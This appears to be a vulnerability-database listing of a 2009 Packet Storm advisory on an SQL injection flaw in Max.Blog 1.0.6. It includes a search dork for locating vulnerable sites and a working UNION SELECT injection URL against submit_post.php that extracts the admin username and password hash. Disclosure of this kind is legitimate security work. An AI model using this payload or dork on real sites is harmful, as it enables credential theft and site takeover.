Lucene search
K

Max.Blog 1.0.6 SQL Injection

🗓️ 28 Jan 2009 00:00:00Reported by Salvatore FrestaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Max.Blog 1.0.6 has an SQL injection vulnerability allowing unauthorized access to credentials.

Code
`################### Salvatore "drosophila" Fresta  
###################  
  
  
Application: Max.Blog  
http://www.mzbservices.com  
Version: Max.Blog <= 1.0.6  
Bug: * SQL Injection  
Exploitation: Remote  
Dork: intext:"Powered by Max.Blog"  
Date: 27 Jan 2009  
Discovered by: Salvatore "drosophila" Fresta  
Author: Salvatore "drosophila" Fresta  
e-mail: [email protected]  
  
  
############################################################################  
  
- BUGS  
  
SQL Injection:  
  
Requisites: magic quotes = off  
  
File affected: submit_post.php  
  
This bug allows a registered user to view username and password  
(md5) of a  
registered user with the specified id (usually 1 for the admin)  
  
http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23  
  
############################################################################  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation